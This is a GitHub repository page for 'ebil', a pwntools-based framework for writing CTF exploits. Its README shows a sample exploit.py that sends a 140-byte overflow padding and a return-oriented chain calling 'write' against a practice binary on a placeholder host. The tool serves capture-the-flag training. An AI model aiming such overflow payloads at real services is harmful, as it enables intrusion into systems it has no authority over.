Skip to content

193s/ebil

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

29 Commits
 
 
 
 
 
 
 
 
 
 

Repository files navigation

ebil

ebil is an exploit code framework for CTFs, based on pwntools

Command line tools + python library

Command line tools

ebil new <process> -> ./exploit.py with process will be generated

Python library

pip install ./py

usage:

./exploit.py   # run locally
./exploit.py p # run locally (pause on breakpoints)
./exploit.py r # remote

exploit.py:

#!/usr/bin/env python
from ebil import *

exec ebil('./vuln', remote=('pwnable.example.com', 35555), args=['wei'], arch='x86_64')

if LOCAL: log.info('** LOCAL **')

payload = 'a'*140

dummy = 0xbeefbeefbeefbeef
payload += chain([
  elf.symbols['write'], dummy, 1, 0x8049348, 4,
])
send(payload, 200)

print repr(r.recvrepeat())

r.wait_for_close()

Installation

git clone https://github.com/193s/ebil && cd ebil
install -v ebil /usr/local/bin
pip install ./py

License

Copyright (c) 2015 193s

Published under the GNU GPLv2, see ./LICENSE

About

Exploit code framework for CTFs

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published